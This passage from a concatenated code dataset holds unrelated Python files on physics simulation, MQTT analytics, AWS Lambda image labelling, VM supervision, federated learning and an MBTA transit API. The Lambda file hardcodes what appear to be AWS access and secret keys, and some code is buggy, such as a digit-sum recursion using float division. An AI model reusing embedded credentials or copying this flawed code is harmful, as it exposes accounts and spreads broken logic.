58e9\n r_o2 = 1.60e-3 # Outer radius\n r_i2 = 0.0 # Inner radius\n k2b = E2 * np.pi / 4 * (r_o2**4 - r_i2**4)\n k2t = G2 * np.pi / 2 * (r_o2**4 - r_i2**4)\n\n self.k1b = k1b\n self.k1t = k1t\n self.k2b = k2b\n self.k2t = k2t\n self.kappa1 = kappa1\n self.kappa2 = kappa2\n\n\n def _diff_equation(self, s, X):\n \"\"\" The differential equation\n \n Args:\n X: 2x1 state vector\n \"\"\"\n theta = X[0]\n theta_dot = X[1]\n\n theta_2dot = (self.k1b * self.k2b * self.kappa1 * self.kappa2 *\n (self.k1t + self.k2t) * np.sin(theta) / (self.k1b * self.k2b\n * (self.k1b + self.k2b))\n )\n return np.array([theta_dot, theta_2dot])\n\n def _forward_integrate(self, X0, step=0.01, s_end=1.0):\n \"\"\" Integrate from 0 -> s_end\n \"\"\"\n # Setup integrator\n itor = ode(self._diff_equation)\n itor.set_integrator('vode', method='bdf')\n itor.set_initial_value(X0, 0)\n\n step = 1.0 / np.round(1.0 / step) # Rounding\n\n X = [X0]\n\n while itor.successful() and itor.t < (s_end - 1e-6):\n itor.integrate(itor.t + step)\n X.append(itor.y)\n\n return np.array(X)\n\n def find_solution(self, theta0, guess=0.0, length=0.14):\n \"\"\" Find theta(L) using shooting method.\n\n Args:\n theta0: basically ``nothing``, *asterisk*, **double asterick**\n \"\"\"\n def g(theta_dot):\n X0 = np.array([theta0, theta_dot])\n\n XL = self._forward_integrate(X0, s_end=length)[-1]\n return XL[1]\n\n root_finding = root(g, guess)\n if root_finding['success']:\n X0 = np.array([theta0, root_finding['x']])\n XL = self._forward_integrate(X0)[-1] # End point\n return XL[0]\n else:\n return False\n\nclass TubePlotting(object):\n\n def __init__(self):\n pass\n\n def integrate_rotation(self, loc_curv, step=0.01):\n \"\"\" Integrate rotation from an array of local curvature.\n \"\"\"\n Rinit = np.eye(3)\n Rs = [Rinit]\n for w in loc_curv:\n v = loc_curv * step # infinitesimal twist\n R = np.dot(Rs[-1], exp(v))\n Rs.append(R)\n return Rs\n\n\n\n \n\n\n\n\n ","sub_path":"elasticity/ConcentricTubes.py","file_name":"ConcentricTubes.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272641595","text":"# Copyright 2019 InfAI (CC SES)\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# #\n# http://www.apache.org/licenses/LICENSE-2.0\n# #\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport datetime\nimport json\nimport os\n\nimport paho.mqtt.client as mqtt\nfrom jsonpath_rw import jsonpath\nfrom jsonpath_rw_ext import parse\n\n# for calling extended methods\nimport jsonpath_rw_ext as jp\n\nCONFIG = json.loads(os.getenv(\"CONFIG\"))\nTOPICS = json.loads(os.getenv(\"INPUT\"))\n\nprint(CONFIG)\nprint(TOPICS)\n\ntest = jp.match1(\"$.[0].mappings[0].source\", TOPICS)\n\nval0 = 0\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n client.subscribe(TOPICS[0][\"name\"])\n\n\ndef on_message(client, userdata, msg):\n global val0\n message = msg.payload.decode('utf8').replace('\"{', '{').replace('\"}', '}').replace('\\\\', '')\n js = json.loads(message)\n val = get_value(js)\n diff = val - val0\n val0 = val\n x = {\n \"pipeline_id\": get_config_value(\"pipelineId\"),\n \"operator_id\": get_config_value(\"operatorId\"),\n \"time\": '{}Z'.format(datetime.datetime.utcnow().isoformat()),\n \"analytics\": {\n \"diff\": diff\n }\n }\n client.publish(get_config_value(\"outputTopic\"), payload=json.dumps(x), qos=0, retain=False)\n\n\ndef get_value(js):\n return jp.match1(get_value_path(), js)\n\n\ndef get_value_path():\n return jp.match1(\"$.[0].mappings[0].source\", TOPICS)\n\n\ndef get_config_value(value):\n return jp.match1(value, CONFIG)\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(os.getenv(\"BROKER_HOST\", \"localhost\"), int(os.getenv(\"BROKER_PORT\", 1883)), 60)\n\nclient.loop_forever()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"106495935","text":"import create_ham as ch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sbn\nfrom scipy import linalg as la\nimport time\nimport functions as fn\nimport create_ham as cHam\nimport functions as func\nimport datetime\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\nsbn.set()\n\nL = 20\nu_in = 1.7\nu_out = 2.4\ncutoff = 0.5\ndisorder_parameter = 0.\n\ndelta = (2 * np.pi) / L\nN_total = L * L * 2\n\nxs_arr = np.arange(L)\nys_arr = np.arange(L)\n\nX_grid, Y_grid = np.meshgrid(xs_arr, ys_arr)\n\n# u_values = np.zeros((L , L )) + u\nedg = False\n# u_values = np.random.normal(u,disorder_parameter,(L, L ))\n\n\nu_values = ((X_grid - L/2).__abs__() <= L/4 )*((Y_grid - L/2).__abs__() <= L/4)*u_in + (((X_grid - L/2).__abs__() > L/4 ) + ((Y_grid - L/2).__abs__() > L/4))*u_out\n\n\n# plt.pcolor(u_values)\n# plt.colorbar()\n# plt.show()\n\nxs = np.zeros(N_total)\nys = np.zeros(N_total)\nfor i in range(N_total):\n _, xs[i], ys[i] = func.number_to_index(i, L)\nX_exp = np.diag(np.exp(1j * xs * delta))\nY_exp = np.diag(np.exp(1j * ys * delta))\nX_exp_star = np.diag(np.exp(-1j * xs * delta))\nY_exp_star = np.diag(np.exp(-1j * ys * delta))\n\nH = cHam.create_full_hamiltonian(u_values, edges=edg)\n\n# plt.pcolor(H.__abs__())\n# plt.show()\n\nP = H * 0\n\neigenvalues, eigenvectors = la.eigh(H)\nfor j in range(N_total):\n P += np.outer(eigenvectors[:, j], np.conj(eigenvectors[:, j])) if eigenvalues[j] <= 0 else 0\n\nUVUV = np.linalg.multi_dot([P, X_exp, P, Y_exp, P, X_exp_star, P, Y_exp_star, P])\nM = UVUV + np.eye(N_total, N_total) - P\n\nT, Z = la.schur(M)\nU, s_vals ,V = la.svd(M)\n\neigs = np.diag(T)\nnubers = np.arange(N_total)\n\n# plt.subplot(1,2,1)\n# thetas = np.linspace(0, 2 * np.pi, 1000)\n# x_circ = np.cos(thetas)\n# y_circ = np.sin(thetas)\n# plt.scatter((eigs).real, (eigs).imag)\n# plt.plot(x_circ+1, y_circ)\n# plt.plot(x_circ * cutoff, y_circ * cutoff)\n#\n# plt.subplot(1,2,2)\n# plt.plot(eigs.__abs__())\n# plt.plot(s_vals[::-1])\n# plt.draw()\n\ncancel_matrix = np.ones((N_total,N_total))\nfor i in range(N_total):\n if (1-eigs[i]).__abs__() >=1 or eigs[i].__abs__() <= cutoff:\n cancel_matrix[i,:] = 0\n cancel_matrix[:,i] = 0\n print(i)\n\nT_fixed = T*cancel_matrix + np.eye(N_total)*(1-cancel_matrix)\n\nplt.pcolor(T_fixed.real>= 1e-8)\nplt.show()\n\nM_fixed = np.linalg.multi_dot([Z, T_fixed, Z.conj().T])\n\nnext = la.logm(M_fixed)\nout = np.diag(next) * L * L\nbott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\nbott_new_method = bott_index_tr.reshape([L, L])\n\nprint('new method done')\n\n# this finds the bott index using the old (dumb) method!\nns = la.null_space(UVUV, rcond = cutoff)\nsh = ns.shape\nQ = np.zeros((N_total,N_total), dtype= 'complex')\nfor n in range(sh[1]):\n Q += np.outer(ns[:, n], np.conj(ns[:, n]))\nnext = la.logm(UVUV + Q*1000000)\nout = np.diag(next) * L * L\nbott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\nbott_old_method = bott_index_tr.reshape([L, L])\n\nx_vector = np.arange(L)\ny_vector = np.arange(L)\nx_grid, y_grid = np.meshgrid(x_vector, y_vector)\n\nprint('old method done')\n\n\n# # this finds the bott index using the shit method!\n# ns = la.null_space(UVUV)\n# sh = ns.shape\n# Q = np.zeros((N_total,N_total), dtype= 'complex')\n# for n in range(sh[1]):\n# Q += np.outer(ns[:, n], np.conj(ns[:, n]))\n# next = la.logm(UVUV + Q*1000000)\n# out = np.diag(next) * L * L\n# bott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\n# bott_shit_method = bott_index_tr.reshape([L, L])\n#\n# print('shit method done')\n\nz_grid = bott_new_method\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nplt.title('New Method')\nplt.draw()\n\n# z_grid = bott_shit_method\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n# ax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n# linewidth=0, antialiased=False)\n# ax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n# linewidth=0, antialiased=False)\n# plt.title('Shit Method')\n# plt.draw()\n\n\nz_grid = bott_old_method\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nplt.title('Old Method')\nplt.show()\n\n","sub_path":"test_bott_singular_values.py","file_name":"test_bott_singular_values.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102709659","text":"\n## Create a function which return a sum of all the individual digits in that integer.\n## For Example: if n=4326, return 4+3+2+6\n\ndef sum_func(n):\n\n # Base case\n if n == 0:\n return 0\n else:\n return n%10 + sum_func(n/10)","sub_path":"Data_Structures_and_Algorithm/4_Recursion/Int_sum_recursion.py","file_name":"Int_sum_recursion.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"32839214","text":"import json\nimport boto3\nimport datetime\nimport requests\nfrom requests_aws4auth import AWS4Auth\nACCESS_KEY = \"AKIA6RHHVSNYQLE2GsCUU\"\nSECRET_KEY = \"6FK94Cl9r0IGisjZioiRH0SKykSZTrH7VZ+tKnpD\" \nregion = 'us-east-1'\nes_service = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, es_service, session_token=credentials.token)\n\n\ndef lambda_handler(event, context):\n bucket_name = event['Records'][0]['s3']['bucket']['name']\n photo_name = event['Records'][0]['s3']['object']['key']\n \n reko = boto3.client('rekognition')\n print(bucket_name)\n print(photo_name)\n print(reko)\n \n response = reko.detect_labels(\n Image={'S3Object':{'Bucket':bucket_name,'Name':photo_name}},\n MaxLabels=10)\n \n # print(response)\n labels = response[\"Labels\"]\n result = []\n for l in labels:\n result.append(l[\"Name\"])\n print(result) \n \n body = {\"objectKey\": photo_name, \"bucket\": bucket_name, \n \"createdTimestamp\":str(datetime.datetime.now()),\n \"labels\": result\n }\n url = \"https://vpc-photos-f36imjquajxkq35w4i5j6xxdee.us-east-1.es.amazonaws.com/photos/_doc\"\n \n res = requests.post(url, auth=awsauth,\n data = json.dumps(body),\n headers = {\"Content-Type\": \"application/json\"})\n print(json.loads(res.text))\n \n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n \n","sub_path":"LF/index_photo.py","file_name":"index_photo.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"105647351","text":"tokens = ('HEAD', 'TITLE', 'YEAR', 'INTEGER', 'FREQUENCY','UNIT')\r\nliterals = ['.', ':' ]\r\n\r\n# Tokens\r\nt_HEAD = r'^Series.*$'\r\nt_TITLE = r'.*Annual\\t'\r\nt_YEAR = r'^d{4}$'\r\nt_FREQUENCY = r'\\tA\\t'\r\nt_UNIT = r'\\tDollars.*$'\r\n\r\n# Ignored characters\r\nt_ignore = \" \\r\"\r\n\r\ndef t_INTEGER(t):\r\n r'\\d+'\r\n try:\r\n t.value = int(t.value)\r\n except ValueError:\r\n print(\"Integer value too large %d\", t.value)\r\n t.value = 0\r\n return t\r\n\r\ndef t_newline(t):\r\n r'\\n+'\r\n t.lexer.lineno += t.value.count(\"\\n\")\r\n\r\ndef t_error(t):\r\n print(\"Illegal character '%s'\" % t.value[0])\r\n t.lexer.skip(1)\r\n\r\n# Build the lexer\r\nimport ply.lex as lex # ply.lex comes from the ply folder in the PLY download.\r\nlexer = lex.lex()\r\n\r\n# Parsing rules\r\n\r\nglobal time_step\r\ntime_step = 0\r\n\r\ndef p_start(t):\r\n '''start : HEAD\r\n | empty\r\n | data\r\n | float\r\n '''\r\n # print (\"Saw: \", t[1])\r\n\r\n\r\ndef p_data(t):\r\n 'data : TITLE INTEGER FREQUENCY float UNIT'\r\n print(\"Year, Price($/bbl): \" + str(t[2]) + \", \" + str(t[4]))\r\n\r\ndef p_float(t):\r\n 'float : INTEGER \".\" INTEGER'\r\n t[0] = str(t[1]) + str(t[2]) + str(t[3])\r\n\r\ndef p_empty(t):\r\n 'empty : '\r\n pass\r\n\r\ndef p_error(t):\r\n if t == None:\r\n print(\"Syntax error at '%s'\" % t)\r\n else:\r\n print(\"Syntax error at '%s'\" % t.value)\r\n\r\nimport ply.yacc as yacc # ply.yacc comes from the ply folder in the PLY download.\r\nparser = yacc.yacc()\r\n\r\nwhile True:\r\n try:\r\n s = input('')\r\n except EOFError:\r\n break\r\n parser.parse(s)\r\n\r\n# To run the parser do the following in a terminal window: cat data.txt | python parse.py\"\r\n","sub_path":"junk/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"302400423","text":"#import the plt and wavfile modules \nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nimport argparse\n\n# argparser\nparser = argparse.ArgumentParser(description=\"Plot audio spectrogram for .wav file\")\nparser.add_argument(\"audio_file\", type=str, help=\".wav file path\")\nargs = parser.parse_args()\n\nfile_path, file_name = os.path.split(args.audio_file)\nfile_path = os.path.join(file_path, file_name)\n\n# Read the wav file (mono)\nsamplingFrequency, signalData = wavfile.read(file_path)\n\n# Plot the signal read from wav file\nplt.title(f'Spectrogram of {file_name}')\nplt.subplot(111)\nplt.specgram(signalData,Fs=samplingFrequency)\nplt.magma()\nplt.xlabel('Time')\nplt.ylabel('Frequency')\nplt.show()","sub_path":"plot_spectrogram.py","file_name":"plot_spectrogram.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"630872456","text":"\"\"\"\nThe VM Supervisor is in charge of executing code, starting and stopping VMs and provides\nand API to launch these operations.\n\nAt it's core, it is currently an asynchronous HTTP server using aiohttp, but this may\nevolve in the future.\n\"\"\"\nimport binascii\nimport logging\nfrom base64 import b32decode, b16encode\nfrom typing import Awaitable, Dict, Any\n\nimport msgpack\nfrom aiohttp import web, ClientResponseError, ClientConnectorError\nfrom aiohttp.web_exceptions import HTTPNotFound, HTTPServiceUnavailable, HTTPBadRequest, \\\n HTTPInternalServerError\nfrom msgpack import UnpackValueError\n\nfrom aleph_message.models import ProgramMessage, ProgramContent\nfrom .conf import settings\nfrom .pool import VmPool\nfrom .storage import get_message\nfrom .vm.firecracker_microvm import ResourceDownloadError, VmSetupError\n\nlogger = logging.getLogger(__name__)\npool = VmPool()\n\n\nasync def index(request: web.Request):\n assert request.method == \"GET\"\n return web.Response(text=\"Server: Aleph VM Supervisor\")\n\n\nasync def try_get_message(ref: str) -> ProgramMessage:\n # Get the message or raise an aiohttp HTTP error\n try:\n return await get_message(ref)\n except ClientConnectorError:\n raise HTTPServiceUnavailable(reason=\"Aleph Connector unavailable\")\n except ClientResponseError as error:\n if error.status == 404:\n raise HTTPNotFound(reason=\"Hash not found\")\n else:\n raise\n\n\ndef build_asgi_scope(path: str, request: web.Request) -> Dict[str, Any]:\n return {\n \"type\": \"http\",\n \"path\": path,\n \"method\": request.method,\n \"query_string\": request.query_string,\n \"headers\": request.raw_headers,\n }\n\n\nasync def run_code(message_ref: str, path: str, request: web.Request) -> web.Response:\n \"\"\"\n Execute the code corresponding to the 'code id' in the path.\n \"\"\"\n\n message: ProgramMessage = await try_get_message(message_ref)\n message_content: ProgramContent = message.content\n\n try:\n vm = await pool.get_a_vm(message_content)\n except ResourceDownloadError as error:\n logger.exception(error)\n raise HTTPBadRequest(reason=\"Code, runtime or data not available\")\n except VmSetupError as error:\n logger.exception(error)\n raise HTTPInternalServerError(reason=\"Error during program initialisation\")\n\n logger.debug(f\"Using vm={vm.vm_id}\")\n\n scope: Dict = build_asgi_scope(path, request)\n\n try:\n result_raw: bytes = await vm.run_code(scope=scope)\n except UnpackValueError as error:\n logger.exception(error)\n return web.Response(status=502, reason=\"Invalid response from VM\")\n\n try:\n result = msgpack.loads(result_raw, raw=False)\n # TODO: Handle other content-types\n\n logger.debug(f\"Result from VM: <<<\\n\\n{str(result)[:1000]}\\n\\n>>>\")\n\n if \"traceback\" in result:\n logger.warning(result[\"traceback\"])\n return web.Response(\n status=500,\n reason=\"Error in VM execution\",\n body=result[\"traceback\"],\n content_type=\"text/plain\",\n )\n\n headers = {key.decode(): value.decode()\n for key, value in result['headers']['headers']}\n\n return web.Response(\n status=result['headers']['status'],\n body=result[\"body\"][\"body\"],\n headers=headers,\n )\n except UnpackValueError as error:\n logger.exception(error)\n return web.Response(status=502, reason=\"Invalid response from VM\")\n finally:\n if settings.REUSE_TIMEOUT > 0:\n pool.keep_in_cache(vm, message_content, timeout=settings.REUSE_TIMEOUT)\n else:\n await vm.teardown()\n\n\ndef run_code_from_path(request: web.Request) -> Awaitable[web.Response]:\n \"\"\"Allow running an Aleph VM function from a URL path\n\n The path is expected to follow the scheme defined in `app.add_routes` below,\n where the identifier of the message is named `ref`.\n \"\"\"\n path = request.match_info[\"suffix\"]\n path = path if path.startswith(\"/\") else f\"/{path}\"\n\n message_ref: str = request.match_info[\"ref\"]\n return run_code(message_ref, path, request)\n\n\ndef b32_to_b16(hash: str) -> bytes:\n \"\"\"Convert base32 encoded bytes to base16 encoded bytes.\"\"\"\n # Add padding\n hash_b32: str = hash.upper() + \"=\" * (56 - len(hash))\n hash_bytes: bytes = b32decode(hash_b32.encode())\n return b16encode(hash_bytes).lower()\n\n\nasync def run_code_from_hostname(request: web.Request) -> web.Response:\n \"\"\"Allow running an Aleph VM function from a hostname\n\n The first component of the hostname is used as identifier of the message defining the\n Aleph VM function.\n\n Since hostname labels are limited to 63 characters and hex(sha256(...)) has a length of 64,\n we expect the hash to be encoded in base32 instead of hexadecimal. Padding is added\n automatically.\n \"\"\"\n path = request.match_info[\"suffix\"]\n path = path if path.startswith(\"/\") else f\"/{path}\"\n\n message_ref_base32 = request.host.split(\".\")[0]\n if settings.FAKE_DATA:\n message_ref = \"test\"\n else:\n try:\n message_ref = b32_to_b16(message_ref_base32).decode()\n except binascii.Error:\n raise HTTPNotFound(reason=\"Invalid message reference\")\n\n return await run_code(message_ref, path, request)\n\n\napp = web.Application()\n\napp.add_routes([web.route(\"*\", \"/vm/{ref}{suffix:.*}\", run_code_from_path)])\napp.add_routes([web.route(\"*\", \"/{suffix:.*}\", run_code_from_hostname)])\n\n\ndef run():\n \"\"\"Run the VM Supervisor.\"\"\"\n settings.check()\n web.run_app(app)\n","sub_path":"vm_supervisor/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96859957","text":"import numpy as np\nfrom scipy.special import expit\n\n\ndef predict_class(x, y, all_theta):\n \"\"\"\n Determines accuracy of model with optimized parameters.\n\n Parameters\n ----------\n x : array_like\n Shape (m, n).\n\n y : array_like\n Shape (m, 1).\n\n all_theta : array_like\n Shape (n + 1, k).\n \"\"\"\n\n y = y.ravel()\n x = np.insert(x, 0, 1, axis=1)\n\n h = expit(x @ all_theta)\n predictions = np.argmax(h, axis=1)\n accuracy = np.mean(predictions == y)\n\n return round(accuracy * 100, 2)\n","sub_path":"multiclass_classification/predict_class.py","file_name":"predict_class.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"218711124","text":"import os\nimport time\n\nimport torch\nimport dateutil.tz\nimport pickle\nfrom tqdm import tqdm\nfrom utils.utils import dice, Logger, Saver, adjust_learning_rate\nfrom config import parse_args\nfrom datetime import datetime\nfrom functions import train, validate\nfrom datasets.paths import get_paths\nfrom datasets.hdf5 import HDF5Dataset\nfrom datasets.dataset import build_dataset\n\nfrom torch.utils.data import DataLoader\nfrom models.vnet_parallel import VNet\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom tqdm import tqdm\ndef main():\n\n args = parse_args()\n args.pretrain = True\n print(\"Using GPU: {}\".format(args.local_rank))\n \n base_lr = args.lr # base learning rate\n batch_size = 1\n max_iterations = 20000\n\n cell_size = 96 # size of volume we crop patch from\n patch_size = 64\n puzzle_config = 3 # 2 or 3 for 2X2X2 or 3X3X3 puzzle\n puzzle_num = puzzle_config ** 3\n feature_len = 256 #\n iter_num = 0\n sr_feature_size = 32\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n train_dataset, val_dataset = build_dataset(args)\n args.world_size = len(args.gpu.split(\",\"))\n if args.world_size > 1:\n os.environ['MASTER_PORT'] = args.port\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(\n 'nccl'\n )\n device = torch.device('cuda:{}'.format(args.local_rank))\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, num_replicas = len(args.gpu.split(\",\")), rank = args.local_rank)\n else:\n train_sampler = None\n \n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, \n shuffle=(train_sampler is None),\n sampler = train_sampler,\n num_workers=args.num_workers, pin_memory=True)\n \n val_loader = torch.utils.data.DataLoader(\n val_dataset, batch_size=1, \n num_workers=args.num_workers, pin_memory=True)\n\n model = VNet(args.n_channels, args.n_classes, input_size = 64, pretrain = True).cuda(args.local_rank)\n model_ema = VNet(args.n_channels, args.n_classes, input_size = 64, pretrain = True).cuda(args.local_rank)\n optimizer = torch.optim.SGD(model.parameters(), lr = args.lr, momentum=0.9, weight_decay=0.0005)\n #scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.7)\n parallel_state_dict = torch.load(args.load_path)['state_dict']\n new_state_dict = {}\n for key in parallel_state_dict.keys():\n new_state_dict[key[7:]] = parallel_state_dict[key]\n\n model.load_state_dict(new_state_dict)\n model.eval()\n print(\"Loaded weights\")\n print(\"Using Dataset: {}\".format(type(train_dataset)))\n\n features = []\n for i, batch in enumerate(tqdm(train_loader)):\n volume = batch['image'].cuda(args.local_rank, non_blocking = True)\n volume = volume.view((-1,) + volume.shape[2:])\n\n with torch.no_grad():\n q = model(volume, pretrain=True)\n\n features.append(q)\n if i > 100:\n break\n features = torch.cat(features, 0)\n\n pickle.dump(features.cpu().numpy(), open(\"features.pkl\", 'wb'))\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"uda/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473972778","text":"import pathlib\nimport random\n\nfrom absl import app\nfrom absl import flags\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nimport data_helpers as data\nimport model_helpers as model\n\n\n# Training hparams\nflags.DEFINE_integer(\"num_rounds\", default=10,\n help=\"Number of rounds of federated averaging.\")\nflags.DEFINE_integer(\"clients_per_round\", default=10,\n help=\"Number of clients to sample for training per round.\")\nflags.DEFINE_float(\"client_learning_rate\", default=.02,\n help=\"Learning rate for client optimizers.\")\nflags.DEFINE_float(\"server_learning_rate\", default=1.0,\n help=\"Learning rate for client optimizers.\")\nflags.DEFINE_integer(\"client_batch_size\", default=4,\n help=\"Local batch size for each client.\")\n\n# Data flags\nflags.DEFINE_string(\"data_root\", default=\"./data\",\n help=\"Path to the root folder containing chest xray data\")\nflags.DEFINE_string(\"train_clients_subdir\", default=\"train_clients\",\n help=\"Subdirectory of `data_root` containing data allocated to the \"\n \"training subset of clients.\")\nflags.DEFINE_string(\"test_clients_subdir\", default=\"test_clients\",\n help=\"Subdirectory of `data-root` containing data allocated to the \"\n \"evaluation subset of clients.\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n if len(argv) > 1:\n raise app.UsageError('Expected no command-line arguments, '\n 'got: {}'.format(argv))\n dataroot = pathlib.Path(FLAGS.data_root)\n train_path = dataroot.joinpath(FLAGS.train_clients_subdir)\n test_path = dataroot.joinpath(FLAGS.test_clients_subdir)\n train_client_ids = data.make_client_ids(train_path)\n test_client_ids = data.make_client_ids(test_path)\n\n train_client_fn = data.provide_client_data_fn(\n train_path, FLAGS.client_batch_size)\n test_client_fn = data.provide_client_data_fn(\n test_path, FLAGS.client_batch_size)\n\n train_clients = tff.simulation.ClientData.from_clients_and_fn(\n train_client_ids, train_client_fn)\n test_clients = tff.simulation.ClientData.from_clients_and_fn(\n test_client_ids, test_client_fn)\n\n federated_train_data = [\n train_clients.create_tf_dataset_for_client(client_id)\n for client_id in train_client_ids\n ]\n federated_test_data = [\n test_clients.create_tf_dataset_for_client(client_id)\n for client_id in test_client_ids\n ]\n\n model_fn = model.model_fn_factory(FLAGS.model)\n client_opt_fn = lambda: tf.keras.optimizers.SGD(FLAGS.client_learning_rate)\n server_opt_fn = lambda: tf.keras.optimizers.SGD(FLAGS.server_learning_rate)\n\n iterative_process = tff.learning.build_federated_averaging_process(\n model_fn, client_opt_fn, server_opt_fn)\n\n state = iterative_process.initialize()\n for rnd in range(FLAGS.num_rounds):\n round_clients = random.sample(\n federated_train_data, FLAGS.clients_per_round)\n state, metrics = iterative_process.next(state, round_clients)\n print('round {rnd}, metrics={metrics}'.format(rnd=rnd, metrics=metrics))\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"tflib/deprecated/train_tff.py","file_name":"train_tff.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"577946613","text":"import requests\nimport json\nfrom datetime import datetime as dt\n\n'''\nSimple python script to acess the MBTA api and return a json. \n'''\n\n#function makes API call to get a list of valid line names \n#this line list will be used to check if user input is valid\ndef create_lines_list(base_url):\n\n\t#set header and parametrs for make_API_Request method params\n\theaders = {\n 'accept': 'application/vnd.api+json',\n\t}\n\n\t#filter routes endpoint to only include Commuter Rail routes\n\tparams = (\n ('filter[type]', '2'),\n\t)\n\n\tline_response = make_API_Request(base_url, \"routes\", headers, params)\n\tline_list = []\n\tfor i in range(len(line_response)):\n\t\tline_list.append((line_response[i]['id'], (line_response[i]['attributes']['long_name'])))\n\n\treturn line_list\n\n#method to take create a list of all stops on a certain Commuter Rail Line\n#@pa\ndef create_stops_list(line_id, base_url):\n\n\theaders = {\n 'accept': 'application/vnd.api+json',\n\t}\n\n\tparams = (\n ('filter[route]', line_id),\n\t)\n\n\tstop_response = make_API_Request(base_url, \"stops\", headers, params)\n\tstop_list = []\n\n\tfor i in range(len(stop_response)):\n\t\tstop_list.append(stop_response[i]['attributes']['name'])\n\t\tprint(stop_response[i]['attributes']['name'])\n\n\treturn stop_list\n\ndef find_travel_direction(beginning, ending):\n\n\t#print(f\"Start Index: {begin_index}\")\n\t#print(f'End Index: {end_index}')\n\n\tif beginning == ending:\n\t\tprint(\"You have chosen the same stop to get on and off at:\")\n\telif beginning < ending:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef find_trips(base_url, direction_id, start_time, line_name, beginning_stop):\n\n\theaders = {\n 'accept': 'application/vnd.api+json',\n\t}\n\n\tparams = (\n\t('page[limit]', '3'),\n ('sort', 'arrival_time'),\n ('filter[direction_id]', direction_id),\n ('filter[min_time]', start_time),\n ('filter[route]', line_name),\n ('filter[stop]', beginning_stop),\n\t)\n\n\tprint(beginning_stop)\n\n\ttrip_response = make_API_Request(base_url, \"schedules\", headers, params)\n\ttrip_list = []\n\tfor i in range(len(trip_response)):\n\t\ttrip_list.append(trip_response[i]['relationships']['trip']['data']['id'])\n\t\t#print(trip_response[i]['relationships']['trip']['data']['id'])\n\n\n\treturn trip_list\n\n\ndef find_times(base_url,trip_list, beginning_stop, ending_stop):\n\n\theaders = {\n 'accept': 'application/vnd.api+json',\n\t}\n\n\n\tbegin_times = []\n\tend_times = []\n\tfor i in range(len(trip_list)):\n\n\t\tparams = (\n \t('filter[trip]', trip_list[i]),\n\t\t)\t\n\n\t\ttime_reponse = make_API_Request(base_url, 'schedules', headers, params)\n\n\t\tfor k in range(len(time_reponse)):\n\t\t\tif time_reponse[k]['relationships']['stop']['data']['id'] == beginning_stop:\n\t\t\t\tbase_time = 